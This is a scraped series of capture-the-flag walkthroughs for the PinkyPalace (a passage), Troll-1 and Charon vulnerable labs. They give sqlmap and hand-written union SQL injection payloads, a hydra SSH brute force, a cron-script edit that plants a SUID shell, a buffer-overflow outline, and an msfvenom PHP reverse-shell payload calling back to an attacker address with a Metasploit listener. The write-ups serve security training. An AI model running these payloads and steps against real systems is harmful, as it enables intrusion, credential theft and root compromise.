dirb http://127.0.0.1:8080/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -p 192.168.1.137:31337

We open the link that was discovered by the dirb scan, it opens up a page that asks for username and password. We tried to check for sql injection using sqlmap and find that the page is vulnerable to sql injection.

Now we enumerate the users and password using sqlmap and find 2 users and the hashes of there password.

sqlmap --proxy=http://192.168.1.137:31337 –data=”user=hacking&pass=articles&submit=Login” -u http://127.0.0.1:8080/littlesecrets-main/login.php --level=5 --risk=3 --dump users

We use the site https://hashkiller.co.uk/md5-decrypter.aspxto decrypt the hash we found in the sqlmap dump. The password for the user pinkymage was decrypted.

We were unable to login through the web server using these credentials. So we used them to login through ssh.

ssh pinkymanage@192.168.1.137-p64666

While enumerating the target machine we find a file called “note.txt” in /var/www/html/littlesecrets-main/ultrasecretadminf1l35/,we open the open and find a hint to search for RSA key. We tried to search for hidden files in the directory and find a hidden file called “.ultrasecret”.

When we take a look at the content of the hidden file; we find a base64 encoded string and when we decrypted it we find that it was a RSA Key.

We tried to decrypt and save the file in the current directory but we don’t have write permissions for the directory. So we decrypt the hidden file and save it in our home directory of user pinkymanage as id_rsa.

Now we move to the home directory for the user pinkymanage and give the RSA key its appropriate permissions. Then we login as user pinky through ssh.

chmod 600 id_rsa

ssh -i id_rsa pinky@localhost -p64666

After logging in as pinky we find two files one executable with suid bit set called “adminhelper” and another text file called “note.txt”. We open the note.txt and find

Now we download the file to our system using base64 to convert the hex strings in the file into base64 encrypted strings

Now we decrypt the file into our system as save it as file admin.

We open the file in our sytem and find a strcpy function in line main+42; as strcpy is vulnerable to buffer overflow. We will try to exploit this vulnerability.

To exploit buffer overflow, first we need to overwrite the adjacent memory locations and find the EIP offset. We use pattern_create.rb script to generate a 78 bytes long string.

./pattern_create.rb -l 78

Now we run the file with the string we generated as our argument and find that we were able to overwrite the EIP.

To find the EIP offset we used the pattern_offset command, and find the EIP offset to be 72.

./pattern_offset.rb -q 356341346341 -l 78

There are no binary defences like NX or ASLR but there is PIE. So we can’t use the ROP tricks, but we can use Shellcode Injection. We overwrite the EIP with the address of our shellcode which was stored in the kernel environment. This spawns a tty shell as root user.

Now we move to root directory and find a file called “root.txt” inside it. We take a look at the content of the file and find the congratulatory flag.

↧

Hack the Troll-1 VM (Boot to Root)

July 13, 2018, 3:54 am

≫ Next: Hack the Box Challenge: Charon Walkthrough

≪ Previous: Hack the Box Challenge: PinkyPalace Walkthrough

Hello friends today we are going to solve another CTF challenge “Troll 1” of the vulnhub labs. The level of this challenge is not so tough and its difficulty level is described as beginner/intermediate. You can download it from here https://www.vulnhub.com/entry/tr0ll-1,100/

Penetrating Methodology

§ Network Scanning (Nmap, netdiscover)

§ Anonymous FTP login

§ Abusing web browser

§ Brute-force attack (hydra)

§ SSH login

§ Privilege Escalation

§ Get root access

§ Capture the flag

Let’s Begin!!

Start with netdiscover command to identify target IP in the local network, in my network 192.168.1.102 is my target IP, you will get yours.

Further let’s enumerate open and protocols information in the target’s network with help of nmap following command:

nmap –A 192.168.1.102

From its result we found port 21 for FTP, 22 for SSH and 80 for HTTP are open. Moreover FTP anonymous login is allowed.

So we explore target IP in the web browser and welcomed by following image………………

Since FTP anonymous login was allowed so we logged in as anonymous: anonymous and download a lol.pcap file

ftp 192.168.1.102

ls –al

get lol.pcap

When we opened lol.pcapfile it was a wireshark TCP packet and when we have opened 1^st TCP stream it put up following image as shown.

While looking in TCP stream 2, I notice something suspicious “sup3rs3cr3tdirlol” it could any possible web directory. So let’s step up for further approach and figure out what this sup3rs3cr3tdirlol indicates.

So when I explore http://192.168.1.102/sup3rs3cr3tdirlolin the web browser, it put up following web page where we found a file roflmao and decide to download it.

Then with help of “string” a tool in kali Linux we explored the file roflmao and got a message ‘Find the address 0x0856BF to proceed’

Then again I explored /0x0856BF in the web browser considering a possible web directory and indeed it gives two sub-directories as shown in the below image.

I opened both sub-directories and /good-luck looks interesting to me as it called a lol.txt file which contains a wordlist and might be this could be useful in conducting the brute force attack against ssh login. Also the folder /this_folder_contains_the_password gave hint “Pass.txt” could be possible password.

Then we copied lol.txt wordlist into a text file and saved as dict.txt for username (remove 5^th line while pasting the content of lol.txt into dict.txt). Since we have username dictionary file and also well aware from password let’s lunch brute-force attack for ssh login and for this you can use following command.

hydra -L /root/Desktop/dict.txt -p Pass.txt 192.168.1.102 ssh

OOOooooh Great!! Here is our possible ssh login credential overflow:Pass.txt

With help of above extracted credential we have made successful SSH login and spawned tty shell victim’s machine. Now let’s finished task quickly and for that we need to escalated root privileges…………….

ssh overflow@192.168.1.102

find / -writable 2

Then we have enumerated all writeable file with help of above command.

We found a python file cleaner.py inside /lib/logand it is a small program. So here the following script was added by admin to cleanup all junk file from inside /tmpand these type of files depends upon specific time interval for executions.

There so many methods to gain root access as in this method we copied /bin/sh inside /tmp and enabled SUID for /tmp/sh. It is quite simple, first, open the file through some editor for example nano sanitizer.py and replace“rm -r /tmp/*” from the following line as given below:

os.system('cp /bin/sh /tmp/sh')

os.system('chmod u+s /tmp/sh')

After some time it will create an sh file inside /tmp directory having SUID permission and when you will run it you will give root access.

cd /tmp

./sh

cd /root

cat proof.txt

HURRAYYYYYYY!!! We hit the Goal……………………………….

↧

Hack the Box Challenge: Charon Walkthrough

July 13, 2018, 4:24 am

≫ Next: Hack the Box Challenge: Falafel Walkthrough

≪ Previous: Hack the Troll-1 VM (Boot to Root)

Hello friends!! Today we are going to solve another CTF challenge “Charon” which is available online for those who want to increase their skill in penetration testing and black box testing. Charon is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.

Level: Expert

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.31 so let’s begin with nmap port enumeration.

nmap -sV 10.10.10.31

From given below image, you can observe we found port 22 and 80 are open on target system.

As port 80 is running http server we open the target machine’s ip address in our browser.

We run dirbuster on port 80, which reveals a directory entitled “cmsdata/”.

We open the link, and are presented with a login page.

We don’t find anything on the login page, so we go to forgot password link.

We capture the request of the page using burpsuite, and send it to repeater.

After sending the request to repeater, we try to enumerate if the site is vulnerable to SQL-injection. As soon as we add a quote at the end of our email id we get a database error.

Now to confirm that the site is vulnerable to SQL-injection we use “-- - “to comment the query and remove the error.

Now as we know the site is vulnerable to SQL injection, we try to exploit it. First we find the number of columns, to check the number of columns we use “ORDER BY” command to find the number of columns in the table. After find the number of columns we use “UNION SELECT” command to give the output column names with the respective numbers. As UNION and union is blacklisted, we use UNion for SQL-injection.

‘UNion SELECT 1,2,3,4 -- -

We couldn’t run any commands in columns, but when we pass a string in column 4, we successfully ran our query.

Now we know how bypass the security using string, we first find the name of the database

‘ UNion select 1,2,3,concat(database(), “@who.ami”) -- -

After finding the name of the database we find the table name in the database.

‘ UNion select 1,2,3,concat(table_name, “@who.ami”) FROM information_schema.tables where table_schema=”supercms” limit 1,1 -- -

Enumerating the tables in the database; we find two tables, one called license and another one called operators.

‘ UNion select 1,2,3,concat(table_name, “@who.ami”) FROM information_schema.tables where table_schema=”supercms” limit 2,1 -- -

After getting the names of the tables, we enumerate the columns. The license table doesn’t have any interesting columns but in the “operators” table we find a column called “__username_”.

‘ UNion select 1,2,3,concat(column_name, “@who.ami”) FROM information_schema.columns where table_name=”operators” limit 1,1 -- -

After getting the “__username_” column we enumerate further and get a column called “__password_”.

‘ UNion select 1,2,3,concat(column_name, “@who.ami”) FROM information_schema.columns where table_name=”operators” limit 2,1 -- -

Now we dump the column name “__username_”.

‘ UNion select 1,2,3,concat(__username_, “@who.ami”) FROM operators limit 1,1 -- -

Now we dump the column name “__password_” for the username = “super_cms_adm”.

‘ UNion select 1,2,3,concat(__username_, “@who.ami”) FROM operators limit 1,1 -- -

When we dump the “__password_” column we get a hash. We use hashkiller.co.uk to crack the password.

Now we got the credentials for the supercms login page, supercms:tamarro.

Now login using the above credentials, we were able to get a page where there is an option for uploading image.

Now we open the link and find an upload page.

We take a look at the source page and find a base64 encoded string.

When we decode it we find a string called “testfile1”. It is possible that there is hidden field with this name.

Now we create a php payload using msfvenom, so that we can upload our php shell.

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.7 lport=4444 -f raw

We capture the upload request and create a new field and add “file.php”.

Now we get the link the location of the file we just uploaded in /images/.

Before running our shell, we setup our listener using metasploit.

msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 10.10.14.7

msf exploit(multi/handler) > set lport 4444

msf exploit(multi/handler) > run

As soon as we open the link to our shell, we get our reverse shell.

meterpreter > sysinfo

Now enumerating through the system we find an encrytpted file and a public key inside /home/decoder directory.

We download both the files into our system.

meterpreter > download decoder.pub /root/Desktop

meterpreter > download pass.crypt /root/Desktop

Now we decode the encrypted file using public key with the RsaCtfTool.

./RsaCtfTool.py --publickey /root/Desktop/decoder.pub –uncipherfile /root/Desktop/pass.crypt

We use ssh to login using the credentials, decoder:nevermindthebollocks.

ssh decoder@10.10.10.31

After logging in we find a file called user.txt, we open the file and find our first flag.

Now we find the files with SUID bit set and find a file called supershell in /usr/local/bin/ directory.

find / -perm -4000 2>/dev/null

When we run the binary we find that we can run any shell command using this binary. We use this to open root.txt inside /root/ directory. When we open root.txt we find our final flag.

supershell “/bin/ls$

> cat /root/root.txt”

↧